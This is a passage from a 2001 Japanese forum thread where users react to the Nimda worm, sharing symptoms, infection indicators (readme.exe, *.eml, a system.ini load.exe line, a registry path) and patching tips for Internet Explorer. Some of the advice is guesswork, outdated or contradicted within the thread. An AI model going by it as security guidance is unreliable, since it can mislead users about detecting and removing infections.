104 :01/09/19 11:11 ID:bi15wNtM
>>181 やっぱノーマルでした…
やばいすよね。更新出来ないし〜
電気屋でCD貰った方がいいですよね。
187 :
169 :01/09/19 11:11 ID:n5wmWdo2
>>179 助言ありがとう!!!!!
何か非常事態みたいだから早速行ってみるよ!!
188 :
:01/09/19 11:12 ID:CIjuhvgQ
>>184 わざとやってるのか???自動リンクさせるな!
189 :
:01/09/19 11:12 ID:6JeAotE2
昨日MSN逝ったら勝手になにかをDLしそうになったので 強制的に閉じましたが、今日PCを立ち上げると必ず 不正な処理が行なわれ〜が表示される。 エクスプローラーをDLしても 「前回の更新が終了してません。」と出てアプデート できない。どうしろと?
190 :
:01/09/19 11:13 ID:NlvHTnzs
>>185 スタート→検索で*.emlを検索してみろ
191 :
:01/09/19 11:13 ID:OT3XX0.2
ネスケのスタッフがワーム配ってたりしてね
>>185 昨日夜から今日の朝にかけてmsnを見ていたら引っかかってる可能性が大きい。
ウイルスチェックのソフトウエアが入っていれば最新のパターンファイルにして、
かつ全ファイル(感染する可能性のあるファイルだけじゃダメ)のウイルスチェック
をするとよい。Norton Antivirusなら検出できるから。
もしソフトウエアを購入すらしてない場合は、あきらめてフォーマットしてから
OSごと再インストールするか、そうでなければウイルスチェックのソフトウエアを
購入せよ。
193 :
:01/09/19 11:13 ID:CN87eRgs
これを機に久しぶりにパソコン雑誌買おうと思うんだけど PC Japanでいいかな?
194 :
:01/09/19 11:13 ID:yNH4JnFA
とりあえずプロクシオミトロンのnimbakillerをいれておいたが 心配だからSP2にもしておこうかな。
195 :
:01/09/19 11:13 ID:qSOu2Upo
>>180 対象者は、IE5.01、5.5のSP1以前。SP2にすれば大丈夫。
あと、ここのここのスレの報告によると5.0もアウトらしい。
もし、更新する前に巡回したいなら、JavaScriptはオフにしておけばいい。
対象となるバージョンのブラウザでは、ダイアログも表示されずにファイルがダウンロード、実行される。
対象外のブラウザではダイアログでるから、ダウンロードしない、ダウンロードしても実行しない。
簡単に言えば、アップデートすれってこと。
196 :
うちだけ? :01/09/19 11:14 ID:cd9RQlRQ
197 :
質問 :01/09/19 11:14 ID:2xMpMAT6
msn隔離しようとしたら、つないでしまいました。 メール到着1件の案内だけだったけど 平気なのかな。こわい。
198 :
:01/09/19 11:14 ID:H/4ljnnI
*.eml 何もでてこない よかった。
199 :
169 :01/09/19 11:14 ID:n5wmWdo2
200 :
:01/09/19 11:15 ID:r1PBvHkQ
漏れの環境は5.00.3315.1000&SP2だけど感染しなかったよ。
>>196 うちもなったぞ。どうやらあちこちのIISを立ち上げてるサイトで一斉チェックを行なっているようだ。
202 :
:01/09/19 11:15 ID:RFnWYkPI
*.emlを検索しても見つからなかったのですが、 他に感染してるか確かめる方法ってないんですか?
203 :
ガシシ右松 :01/09/19 11:15 ID:edUaqhG2
204 :
:01/09/19 11:15 ID:qSOu2Upo
>>197 何時頃まで感染状態だったのかしらんけど、
今朝あたりには既にmsnは直ってたよ。
205 :
:01/09/19 11:16 ID:TH3yhgJE
なんか80番叩いてくるヤツを逆に叩き返すとお約束のようにIISが居て、そのうち 半分は例のhtmlがひっついてるよ。こりゃ未曾有の事態だな。
206 :
:01/09/19 11:16 ID:FuOd4MA6
readme.exe MEP51B3.TMP.EXE を削除するだけじゃダメなん?
207 :
:01/09/19 11:16 ID:muRQhq5k
ノートンの更新リストに載ってますよね?
208 :
169 :01/09/19 11:17 ID:n5wmWdo2
>>192 msmは見てないです。
でもウイルスチェックはやってみます。
209 :
:01/09/19 11:16 ID:Fp8Ge/fo
オレIE6だった・・ヨカタヨ
210 :
:01/09/19 11:17 ID:XDNpbKcY
>180 ファイルのダウンロードも無効にしたほがいいと思われ。
211 :
ナナシサソ :01/09/19 11:17 ID:uy8Pfu/w
212 :
林檎 :01/09/19 11:17 ID:arcTtH9Y
漏れは、関係ないの?
213 :
104 :01/09/19 11:17 ID:bi15wNtM
>>190 あのー、メールがたくさん出てきたんですが・・・
214 :
質問 :01/09/19 11:18 ID:2xMpMAT6
エラー画面とかでなきゃ、平気なのでしょうか。 検索かけたけど、*.emlはみつからず。
215 :
ガシシ右松 :01/09/19 11:18 ID:edUaqhG2
ActiveX,JavaScript,Java,Javaアプレット,ファイルのダウソオフでいいんかな?
217 :
169 :01/09/19 11:19 ID:n5wmWdo2
*.emlっての出てこなかった! まだ感染されてないけど今から対策しないと・・・
>>213 君はOutlook Expressを通常のメーラーとして使っているな?
だとしたら何はともあれウイルスチェックせよ。
>>212 今回は林檎の奴は無関係。
「ネットワークが重い」という二次的被害はあるかもしれないが。
219 :
:01/09/19 11:19 ID:qq6rhHg6
desktop.emlってファイルが600個近く・・・
220 :
:01/09/19 11:19 ID:r.RMappI
221 :
:01/09/19 11:19 ID:FbuD5hAI
セキュリティレベルを高にすれば安全でしょ??
222 :
¥ :01/09/19 11:20 ID:lwMqEV8k
SP2 入れたと思うんですけどどうやって確認すればよいのでしょうか? どなたか教えていただけますか?お願いします。
223 :
104 :01/09/19 11:20 ID:bi15wNtM
>>218 了解です。
セキュリティ尼尼だったYO
224 :
質問 :01/09/19 11:20 ID:2xMpMAT6
メッセンジャーからは感染しないってことなのかしら?<msn
225 :
:01/09/19 11:20 ID:obr1SLpY
このスレはじめてみたけど、ようはSP2をダウンロードするなということなんでしょうか?
>>219 ご愁傷様。あきらめてフォーマットして再インストール・・かな。
227 :
:01/09/19 11:20 ID:CIjuhvgQ
228 :
212 :01/09/19 11:20 ID:arcTtH9Y
229 :
:01/09/19 11:20 ID:7tfTt.Mw
>>189 うちも同じ
まだ再起動してないけど、、、、
感染してるサイト行ったら
ファイルのダウンロード画面出て、その直後
エクスプローラーが落ちた
んでSP2落として実行しても前回のセットアップが完了
してないから再起動しろって出るよ。
Win2000でIE5.01 SP1
230 :
:01/09/19 11:20 ID:bKtwUKkM
231 :
:01/09/19 11:21 ID:qSOu2Upo
232 :
:01/09/19 11:21 ID:1L5pANOU
>>206 ウイルスには他のファイルなどを変質させて複製を潜伏させる物が多い(つうかほとんど)から
実行されたらそれを消しただけで復帰と言うことはまずないと思われる。
実行していないなら早急に削除してなかったことにするとよろし
233 :
:01/09/19 11:22 ID:OIgogmyI
>>190 それでなにかヒットしたら感染してるって事?
234 :
:01/09/19 11:22 ID:cd9RQlRQ
235 :
:01/09/19 11:22 ID:dEiwDa16
readme.emlの中身を適当なアプリに替えて 別マシンのIEで表示したら自動的に起動したよ。 それどころか左側のプレビューに表示された時点で実行された。コワイコワイ。
236 :
質問 :01/09/19 11:23 ID:2xMpMAT6
>>204 情報ありがとうございます。
そうか、落ち着くまで2ちゃん以外はいかないことにします。
msnメッセにつないだのは今さっき、一応何事も起こってないもよう。
友達は思い切り感染。
>>228 林檎の人は手が空いていたら片っ端からWindowsユーザに周知してくれ。
被害をできる限り早く食い止めるために。
ただ、そのときあまり角の立った知らせ方をしないようにね(^^;
>>191 グリ森事件の時の不二家犯行説に似てる(ワラ
239 :
:01/09/19 11:23 ID:oEnvj8ik
タリバンすげえ。マジ凄いよ
240 :
219 :01/09/19 11:24 ID:qq6rhHg6
消したけどまだ不安・・・他にやることってあるのかな。
241 :
:01/09/19 11:24 ID:bD0/QBps
1MSNにいかない 身に覚えがないのファイルは 「実行しますか?」ときかれても「いいえ」クリックする。 (これで最悪の事態は間一発で回避できた。) インターネットエクスプローラ5.5サービスパック2をインストール。
242 :
104 :01/09/19 11:25 ID:bi15wNtM
これってタリバンなのかなー。
243 :
:01/09/19 11:25 ID:1L5pANOU
244 :
:01/09/19 11:25 ID:XDNpbKcY
245 :
:01/09/19 11:26 ID:OIgogmyI
わりと最近MSN逝ったんだけどうちのは大丈夫だったらしい。 ワカンタンカの恵みあれ。
246 :
:01/09/19 11:26 ID:mxUXkeNs
247 :
NIMDAの確認方法 :01/09/19 11:27 ID:W68xhoi.
スタートメニュー→検索→ファイルやフォルダを選び、 名前の項目に以下を一行ずつ入力して検索してみる。 *.eml readme.exe MEP51B3.TMP.EXE これで感染の有無がとりあえず判断できる。
248 :
:01/09/19 11:27 ID:cd9RQlRQ
けっこうマトモなスレだな
249 :
対応方法 :01/09/19 11:28 ID:byucTCuc
250 :
228 :01/09/19 11:28 ID:arcTtH9Y
>>237 了解でやんす。
前スレも読んで、勉強してから啓蒙活動に移ります
251 :
229 :01/09/19 11:28 ID:7tfTt.Mw
IE 5.01 SP1で *.emi や readme.exe は検索で出てこなかったんですけど 感染したサイトにいった直後エクスプローラーが落ちました SP2を実行しても前回のセットアップが完了していない と言われてアップデート出来ないです。 これは感染してるんでしょうか?
252 :
:01/09/19 11:28 ID:r7ysho2g
ネスケでよかったよ・・・
253 :
:01/09/19 11:29 ID:1L5pANOU
>>219 感染済みなら削除しても潜伏の可能性があるので、回線カットして
バックアップから入れなおしか、ワクチンが出るまで我慢するかしないと
被害拡大の手伝いをすることになりうるよ
254 :
:01/09/19 11:29 ID:CIjuhvgQ
>>246 それは感染したサイトのほんの一部でしょう。ヽ(´ー`)ノ
255 :
:01/09/19 11:30 ID:w88symTc
*.emlで検索したら、このスレのログが出てきた(苦笑)
>>221 いやー一応目でも各項目を確認しといたほうが安心しない?
セキュリティ高で各項目がどう設定されてるかなんて一々覚えてないし。
なんかセキュリティのレベルを書き換えちゃうウィルスとかもあったし・・
>>243 たぶん未感染なので大丈夫かな。普段スクリプトオフだし。たぶん。ありがとお。
257 :
:01/09/19 11:30 ID:XDNpbKcY
258 :
113 :01/09/19 11:30 ID:LNEMDmj.
>>195 ありがとう
なんかだんだん増えてきた・・・
>>220 ソースでヒットしてるわけじゃないのでは?
260 :
:01/09/19 11:30 ID:NlvHTnzs
>>251 検索で探す場所をローカルハードドライブにしてある?
261 :
:01/09/19 11:31 ID:ZftG5Ghw
バージョンは、、、5.0とある じゃ大丈夫なんだろうか
262 :
:01/09/19 11:31 ID:KpYJi8SA
ウイルスバスターで大丈夫? 今朝、アップデートしたばかりなんだけど・・・
>>251 それってIEの最新バージョンを入れようとしてセットアップに失敗してない?
一部のDLLとかがIEの最新バージョンになっていて、不整合状態になっていると思う。
>>250 感謝。どなたかは知らぬが親切心に頭が下がる思いです。
264 :
:01/09/19 11:32 ID:87S0kctg
え、俺5.01sp2入れちゃったよ。 それじゃダメなの? 5.5だとうちのパソと相性悪くてエラーでまくりなんだよね。
265 :
:01/09/19 11:33 ID:OIgogmyI
>>264 5.5でこけるのってどう言う不具合が出るのさ?
266 :
:01/09/19 11:33 ID:qSOu2Upo
267 :
:01/09/19 11:34 ID:jBy9Jubo
感染している人数って
268 :
超初心者 :01/09/19 11:34 ID:OwlMzofk
なんのことやらさっぱりわからないです・・・ 一応言われたのをダウンロードしに行くといったんだけど 一応なんでもOKとしていたらダウンロードに12時間てでて キャンセルしてきました(T∀T) 電話線つかってるし・・・ こんな私はまず何をすればよいのでしょう。 今使っているのはバージョン4とヘルプで見てなっていました。 みなさんよろしくお願いします・・・
269 :
:01/09/19 11:34 ID:CIjuhvgQ
270 :
初心者1号 :01/09/19 11:34 ID:zsQE2Q3w
みなさん、ありがとうございました。 おかげさまでIE5.5 SP2をDLしました。 これからも速報板にはお世話になります。 では、よろしくお願いします!
271 :
林檎コロッケ :01/09/19 11:35 ID:Le80enrg
教えて下さい。 とりあえずアップデートでセキュリティ問題の修正プログラムというのを ダウンロードしてる最中なんですがこれでいいのですか。 最初ダウンロート残り時間が38分でしたが、48、1時間18分と 増えていきます。 不安です。 初心者なんです、よろしくお願いします。
272 :
:01/09/19 11:35 ID:rlD4PB5g
すまねえ ドシロートなんだがIE5.5のSP2をダウンロードすると途中の「タスクスケジューラの署名を確認しています」のところまでいくと「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、最後までいかないんだけど・・ 何故か?
273 :
ナナシサソ :01/09/19 11:35 ID:uy8Pfu/w
274 :
:01/09/19 11:36 ID:HO83CofY
ファイアウォール入れてるけど、大丈夫?
275 :
269 :01/09/19 11:36 ID:CIjuhvgQ
276 :
:01/09/19 11:36 ID:V0EVsFhs
IE5.5入れるとモナーがズレルでしょ
277 :
:01/09/19 11:36 ID:Jv..cQeQ
Readme.exe2個検出・・・(汗) \windows\option\printia\xj-800とかいう所にまとめてあった
278 :
^^。 :01/09/19 11:36 ID:YqOIBj/g
>>116 でIE6(体験版じゃないやつ)出てるの知った。
色々勉強にもなった。速報板って2chの華。多謝多謝。
279 :
:01/09/19 11:36 ID:1L5pANOU
ログの速度見ると、とりあえずパニックは収束したかな? あとはこのウイルスが他のファイルへの潜伏性を持つかに かかっているって所か
280 :
:01/09/19 11:36 ID:tuWeHvZk
>>268 パソコン雑誌付属のCDで組み込むっていうのはどう?
281 :
:01/09/19 11:36 ID:p0HcAdmo
感染した場合の具体的被害はどのようなものなのでしょうか?
282 :
名無し :01/09/19 11:36 ID:r9Obg67M
283 :
バカ :01/09/19 11:36 ID:RloGqjUs
もし感染してたら readme.exe と readme.eml を 削除するだけでいいの?
284 :
:01/09/19 11:37 ID:qasMGDqo
*.eml で検索したけれど、古いファイルが10個くらい。 readme.exe も、readme.eml もないけど。 eml という拡張子のファイルがあるだけで、感染してるってこと?
285 :
:01/09/19 11:37 ID://okMxmk
上で言われてる検索はクリア。 朝この事知って速攻でIE5.5SP2に更新。 これでOK?
286 :
:01/09/19 11:37 ID:lytVXhMI
わからなくて、何度も失敗しつつも 何とかSP2に更新できました。 そのあと、アイコンに「インターネットに接続」って、 加わってたんだけど、それも何か操作しなければいけませんか?
287 :
:01/09/19 11:38 ID:NlvHTnzs
>>279 あまり気にしてない奴が多いからだと思われ
288 :
超初心者 :01/09/19 11:38 ID:OwlMzofk
>>280 パソコン雑誌付属のCDですか。
どんな本についていますか?
本当に初心者で・・・
289 :
:01/09/19 11:38 ID:bq3Ce/eg
サイバーテロかよ
290 :
:01/09/19 11:38 ID:H/4ljnnI
来た!!!!!!!!!!!!!!!!!!! いま、いろいろまわってたら、 ヘンなモンをダウンロードしますか?って出てきた! SP2入れたのに!!!!!!!!!!!!! ダウンロードサイト「ふりっぽ」でした(たぶん)。 恐い!SP2入れただけじゃダメなん?
291 :
:01/09/19 11:38 ID:XDNpbKcY
>284 感染してる可能性があるってだけ。 オンラインスキャンかなんかでそのファイルを検査するべき。
>>268 とりあえず雑誌の付録や店頭のプロバイダ販促用CD-ROMをゲットしてきて、
IE5.01SP2かIE5.5SP2にすることを勧める。
>>271 たぶんダウンロード速度が遅いのでしょう。そのまま待つか、
電話回線のように課金が気になるのならIE5.01SP2 or IE5.5SP2
だけインストールしておくと良い。
>272
タスクスケジューラは今回のワームには影響を与えないはずなので、
とりあえず必要はないと思う。
293 :
:01/09/19 11:39 ID:H/4ljnnI
>>285 SP2になったのに、なんかヘンなのが出てくるよぉ!
恐いっす!
294 :
_ :01/09/19 11:39 ID:.FNeXM3I
厨質でスマソ IE6ダウンロードしようとすると、クックタイム(?)が壊れた(破れた) みたいな表示が出てダウンロードできない…… 説明書見たが載ってない。困った。
295 :
:01/09/19 11:39 ID:mxUXkeNs
296 :
:01/09/19 11:39 ID:qSOu2Upo
>>290 いや、だから、SP2入れてないとそれすら出ずにダウソ&実行されちゃうのよ。
297 :
284 :01/09/19 11:40 ID:qasMGDqo
298 :
:01/09/19 11:40 ID:CIjuhvgQ
>>290 ふりっぽ感染してますね。。。。(;´Д`)
299 :
質問 :01/09/19 11:40 ID:2xMpMAT6
javaスクリプトのセキュリティーですが、 無効にすればいいのでしょうか?
300 :
:01/09/19 11:40 ID:XDNpbKcY
>294 ActiveXをオフにしてない?
301 :
奈々子 :01/09/19 11:40 ID:RloGqjUs
誰か駆除の方法教えてくれ〜
302 :
:01/09/19 11:41 ID:noRjlvxY
proxomitron入れてると少しは役に立つ?
303 :
質問 :01/09/19 11:41 ID:2xMpMAT6
セキュリティーレベルは高いにしました。 ウィン2000です。
>>290 そこで「いいえ」or「キャンセル」を選ぶだけでよい。
305 :
アシ :01/09/19 11:41 ID:P8sV8xgI
スマヌが誰か纏めて欲しいなり ・ウイルスに感染した際におこる症状 ・感染を防ぐ為の対処方 ・感染を確認する方法 ・感染した際の治療方法 他力本願(゚д゚)ウマー
306 :
:01/09/19 11:41 ID:7y1npfxY
誰かスーパー初心者に分かるように説明して下さい。お願いします。
307 :
:01/09/19 11:42 ID:NmYNJujQ
308 :
:01/09/19 11:42 ID://okMxmk
あーもうっ、何度見てもSP2をプレステ2って読んじまう。
309 :
対処方法 :01/09/19 11:43 ID:byucTCuc
310 :
:01/09/19 11:43 ID:lytVXhMI
なんか、わかんない…。 一応、更新したけど、不安。 会社のPCだから、まーいいか。
311 :
:01/09/19 11:43 ID:70l4IFsk
312 :
:01/09/19 11:43 ID:lonPx4GA
>305 感染する可能性のあるOSとブラウザも追加キボー
313 :
ななし :01/09/19 11:43 ID:Z8TToPWU
ココ読んで、IE5.5sp2をDLした。 その後、すぐに、 *.eml readme.exe MEP51B3.TMP.EXE を検索。結果、何もなし。 とりあえず、安心。 教えてくれた人、ありがとう。
314 :
じゃあ :01/09/19 11:44 ID:qgdGXqcg
ハードディスク検索して*.emlがなかったら、 今のところは感染してないってことでいいんですか?
316 :
:01/09/19 11:44 ID:Hvn1578.
かちゅ〜しゃ便利なんでここんとこWindows中心に使ってだけど、やっぱMacに戻るわ俺・・・ なんでこういう自体になるのか。呆れて開いた口がふさがらん。
317 :
:01/09/19 11:45 ID:Hvn1578.
馬鹿IMめ。事態だ。
318 :
便裸殿 :01/09/19 11:45 ID:TgjfRWiE
サイバーテロだ
319 :
:01/09/19 11:46 ID:qasMGDqo
>>306 IEのヴァージョンが5.01以下だと、ウィルスに感染したWEBサイトを見る
だけで、感染しちゃうらしい。Windows Update で、IEの5.5 SP2 をDLする。
その前に、感染してないかどうか、PCの「ファイル検索」で、*eml、
readme.exe を検索してみたほうがいい。…と私も初心者だけど、こう
理解しました。あってるのかな…。
320 :
:01/09/19 11:46 ID:VXccxyFg
IE6で感染サイトにいってみたけど、どこもやたら重い。 あと、「オーディオまたはビデオのリンクがクリックされました〜(略) 項目を再生しますか?」というメッセージが出て、いいえを選んでも 何故かメディアプレーヤーが立ち上がるんだけど・・・これは何? あと、*.emlでHD検索したらTemporaryInternetフォルダにreadme[1].emlって のが3つほど入ってた(日付・時間はちょうど感染サイトを覗いた時間)。
321 :
:01/09/19 11:46 ID:yNH4JnFA
>>302 対策フィルタが掲示板に出た。
ただし応急措置だそうで、ブラウザのアップデートはしたほうがいいと思う。
322 :
:01/09/19 11:46 ID:XDNpbKcY
>>314 system.iniに
Shell= explorer.exe load.exe -dontrunold
が無いかをチェックする方が確実かな。。。
マカなんだけど。hotmailで 感染サイトに「感染の連絡」を入れても 平気ですか?2次感染とかならないですか?
324 :
305 :01/09/19 11:47 ID:QNJbbSso
感謝!!!!
326 :
104 :01/09/19 11:48 ID:bi15wNtM
ページを表示できません DL出来ないっす(TT Win2000なんですが・・
327 :
:01/09/19 11:49 ID:jRZmvYDw
5.5SP2より6.0の方がやっぱり安心なの?
328 :
:01/09/19 11:49 ID:mxUXkeNs
329 :
:01/09/19 11:48 ID:RloGqjUs
>>307 俺は鬱っちゃいないけど
鬱っちゃった人にどうアドバイスしてあげれば
いいのかわかんなくて・・・
>>320 それがウイルスの実体。実行しなければ良い。
心配ならウイルスチェック。
331 :
294 :01/09/19 11:50 ID:.FNeXM3I
>>300 さま
ActiveX??
エクスプローラーの検索、コントロールパネルの画面
などで探したのですが見つかりません。
アクティブデスクトップは「Webページで表示」にチェックが入ってます。
332 :
251 :01/09/19 11:50 ID:NAhk67QQ
>>260 ローカルハードドライブで検索しても
出てこなかったです。
>>263 とりあえず再起動したらSP2当てれるようになりました。
うーーん感染してたんかいな。
333 :
:01/09/19 11:50 ID:70l4IFsk
334 :
314 :01/09/19 11:52 ID:qgdGXqcg
335 :
:01/09/19 11:52 ID:r.RMappI
ところで、win98で鬱った人いるの?
>>332 > とりあえず再起動したらSP2当てれるようになりました
いや、単に再起動しないと置き換えることが出来ないファイルがあっただけ。
Windowsの標準的な振る舞いなんで、ウイルスの感染とは無関係だよ。
337 :
:01/09/19 11:52 ID:J6gqWM9Q
>>330 おまえ、何さっきからでしゃばってんの?
だれ?単なるWin厨?
338 :
:01/09/19 11:53 ID:bD0/QBps
ファイルサイズはいくらですか?
339 :
:01/09/19 11:53 ID:XDNpbKcY
>>331 インターネットオプションのセキュリティ(インターネット)を中に。
この設定自体あんましよくないんだけど
更新終わったら高にしたほがいいかも。
340 :
333のうんこたれぞうくんへ :01/09/19 11:53 ID:rUiXeQag
やれやれ、なにもしらない馬鹿がハッカー気取りでいうなよ。 わざわざ追跡されるようなへまはしねえよ。
341 :
:01/09/19 11:54 ID:kytsujbk
342 :
:01/09/19 11:54 ID:qasMGDqo
>>331 ActiveXは、「インターネットオプション」のセキュリティのところに
設定があるよ。
343 :
:01/09/19 11:54 ID:FbuD5hAI
インターネットオプションのセキュリティ(インターネット)を高にしたらクッキーをうけつけるにしないと2chに書き込みできな。
344 :
:01/09/19 11:55 ID:p0HcAdmo
なんかかちゅ〜しゃが重くなってきた 2ch大丈夫か?
345 :
ナナシサソ :01/09/19 11:55 ID:uy8Pfu/w
W32.Nimda.A@mm、とりあえずの対策(気休め)
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000321.htm ・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。
・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。
↑
そうなのか?!
346 :
:01/09/19 11:56 ID:MM8OKJgc
試しに、使っていないPCに感染させてみよう。
347 :
:01/09/19 11:57 ID:nyeYs6WI
348 :
:01/09/19 11:57 ID:RloGqjUs
>>345 サンクス。
やっぱ感染したら再インストールしかないのか・・・
350 :
:01/09/19 11:57 ID:VXccxyFg
>>330 御教授、ありがとうございます。早速インターネット一時ファイルを
削除して消しときました。
351 :
:01/09/19 11:57 ID:JkcCzA82
昨晩ホットメールからサインアウトしたところmsnに強制転送され当該ファイルをダウンロードされました。
ZONEALARMに引っ掛かって確認したときには同じようなファイルが2つ・・。
ゴミ箱送りにしておきましたが、コイツだったとは・・
会社でこの件を知りましたが、帰ってPC見るのが欝だ。
>>335 win98は感染しないんですか?
352 :
:01/09/19 11:57 ID:qasMGDqo
>>337 なにからんでるの? 親切に教えてくれてる人じゃない。
353 :
初心者1号 :01/09/19 11:58 ID:zsQE2Q3w
354 :
:01/09/19 11:58 ID:1L5pANOU
対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 もしかしたら他のファイルに潜伏するかもしれない。 感染の有無の確認 『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT 感染時の対応 感染してしまった後は、アップデートしても無意味。 とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン ツを回らない。 ワクチンで鍛代とかの情報など、追加のフォロー宜しく!>ALL
355 :
:01/09/19 11:59 ID:WbSQL4Qc
356 :
:01/09/19 11:59 ID:V0EVsFhs
>>344 いや2chはいたって普通
お前のパソコン大丈夫か?
357 :
:01/09/19 12:00 ID:PPzqfDyw
マイクロソフトの最悪バージョンUPを嫌ったユーザーを狙って最悪なテロ行為。 激しい憤りを感じます。
358 :
:01/09/19 12:00 ID:H4gW7jNw
で、2chは大丈夫なんだろーな?
359 :
報告 :01/09/19 12:01 ID:cVbss392
中国のシンセンからのメールにくっ付いてきやがった!!!
360 :
:01/09/19 12:01 ID:FuOd4MA6
>>354 >感染の有無の確認
>『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
有るだけで感染?
実行してなくても?
361 :
331 :01/09/19 12:01 ID:.FNeXM3I
>>339 さま
>>342 さま
たびたびすみません。
セキュリティの設定を調べてみました。
ActiveX関連はすべて「有効」
セキュリティレベルは「中」
となってました。感染以外の話題ですみませんです。
362 :
バiタ :01/09/19 12:01 ID:RpkGMlcw
ちなみにネスケは奴ら自らスパイウェア仕込んでたた前科があるから まったく信用できねえ。 MSもワードに仕込んでたから信用できねえ。 結局、どいつもこいつも信用できねえ。
363 :
:01/09/19 12:01 ID:XDNpbKcY
Meについてるシステムの復元+感染ファイル削除とかでは無理かな・・・ 実験したいがマシンがない(汗
364 :
:01/09/19 12:02 ID:CIjuhvgQ
>>354 この部分も追加した方が良いんじゃないか?
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすましています。
感染したPCはCドライブをネットワーク共有する
365 :
:01/09/19 12:02 ID:qq6rhHg6
うちの会社のサーバーに感染しちゃってるYO!
366 :
:01/09/19 12:02 ID:nyeYs6WI
mep????.tmp に変化するみたいだから、いちお mep でも検索した方が良いよ。
>>358 2ちゃんねるはIISではないんで無関係。
368 :
名無しさん :01/09/19 12:02 ID:t5ePDc5w
考えてみりゃ、msnなんて半年以上も見てなかったよ。 どうせだから、5.5sp2から6にしといた。
369 :
名無しさん :01/09/19 12:02 ID:VKE9ZaK.
370 :
1 :01/09/19 12:03 ID:mxUXkeNs
◆◆◆ さらに追加情報 ◆◆◆ このウイルスはLANの共有フォルダを使っても自己増殖ワーム行為を するそうです。 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 わりとパニックになります つーか かなり。 ◆ いろいろ終わり ◆
371 :
:01/09/19 12:03 ID:eH8GVVTM
誰か教えて。 emlって拡張子のやつがあったら、 感染してる可能性あるの? 2つあったんだけど・・・
372 :
:01/09/19 12:04 ID:J6gqWM9Q
>>352 てきとーなWin厨知識を振りかざしてるだけ。
な、Winから入った管理者気取り、な。
373 :
初心者55号 :01/09/19 12:04 ID:EZWqIQ0.
IE5.0から 5.01SP2or5.5SP2のどちらにバージョンUPすれば 良いのか教えてください。 どっちでもよいのかな?
374 :
:01/09/19 12:04 ID:qSOu2Upo
>>371 ただのOEのファイルでもあるからなんともいえんけど。
他のチェック項目調べてみたら?
375 :
:01/09/19 12:04 ID:u4ESP9oo
なんかしらんが強烈な勢いでアタックかけられてるんだが・・・。
376 :
:01/09/19 12:05 ID:n5wmWdo2
近所にCD付属のPC本おいてるトコ無かったし アップデートもあと6時間以上も掛かるし・・・ 2ch以外は行かないでおこう(TДT)
377 :
:01/09/19 12:05 ID:cFHCRmHk
379 :
:01/09/19 12:06 ID:qqVxz.uA
>>370 まじで!?おもしろいことになってきたなオイ
380 :
:01/09/19 12:06 ID:qasMGDqo
>>372 よくわかんないや、、、、あなたの方がカリカリしすぎ
381 :
:01/09/19 12:06 ID:VXccxyFg
>>371 日付を見て古かったら問題ないと思うけど
382 :
! :01/09/19 12:07 ID:3/bSVvek
!
383 :
113 :01/09/19 12:07 ID:LNEMDmj.
初心者が思う疑問 大変な事態だと思うのに、 ・スレのスピードが遅い ・ニュースでやってない(いいとも見てるからかw)
384 :
:01/09/19 12:07 ID:g1MKGlEI
385 :
:01/09/19 12:08 ID:p5f2KD92
>>383 マスコミにコレが大変な事態だと認識できる人はほとんどおりません。
386 :
:01/09/19 12:08 ID:QT5aH0Bw
>370=>378 あんたかっこいい。無駄口利くヤツのがどーみても厨房。嫉妬だろ?
387 :
:01/09/19 12:08 ID:QzWYZO/c
emlってHTML形式のメールの拡張子だから、 例え見つかったとしても、それが以前に自分の書いた 見覚えのあるメールだったら、それはウイルスではないよ。 一応、保存しておく理由がなければ消去しておいたほうが安心だけど
388 :
素朴 :01/09/19 12:08 ID:9pVtadno
IE6って使いやすくなってるん?
389 :
:01/09/19 12:08 ID:iOVUc1CA
みんなまだ知らないのかな 会社とかでは騒ぎになってるのだろうか?
390 :
・ :01/09/19 12:09 ID:McRIbKxw
このウイルスってどうやって広がってるの(WEBで) メールとかで広がってくのは理屈が分かるけど WEB見ただけで感染して、その感染した人がメール送っても感染? ネット上でかってに自己繁殖ってどういう事さ・・・。 感染した人がHPの更新とかしたら、もうそのHPはウイルス元って事? 色々調べたいけど、感染するのコワイから 今日だけ教えてちゃんを許して・・・・。
391 :
:01/09/19 12:09 ID:J6gqWM9Q
>>378 SPとか、俺にはさっぱりわからん。
ばっかじゃないのか?
Winを使ってるやつがいるから、CodeBlueもNimda
もこんな事態になるんだよ、、、
こちとらいい迷惑だよ。ログは増大するは通信速度は
低下するわ。
氏ね M$信者
392 :
:01/09/19 12:09 ID:g1MKGlEI
>>383 朝のニュースでやってたよ。
ネットワークセキュリティ関連の株があがってるよ!
393 :
名無しさんおなかいっぱい。 :01/09/19 12:10 ID:ceLFif3I
モナー板を頻繁に見るなら5、0だね
394 :
asd :01/09/19 12:10 ID:F2AdiCCw
eml≠HTML形式メイルだYO!
395 :
ナナシサン :01/09/19 12:10 ID:NcYZVJw.
>390 前スレから読むニダ
396 :
:01/09/19 12:10 ID:OO3wQbOI
Nimda はどうも、 ADMIN を逆から読んだもののようですね。
397 :
:01/09/19 12:10 ID:Ixk/zxLM
関係ない話で悪いのですが、 IE5.5 SP2についてくるインターネットツールって何ですか?
398 :
:01/09/19 12:10 ID:AXdw0Hxk
親切にSP2挿れてあげたらPC動かなくなった。鬱だ
399 :
:01/09/19 12:10 ID:n5wmWdo2
>>384 ネスケってMac専用じゃなかったの!?
400 :
:01/09/19 12:11 ID:FuOd4MA6
401 :
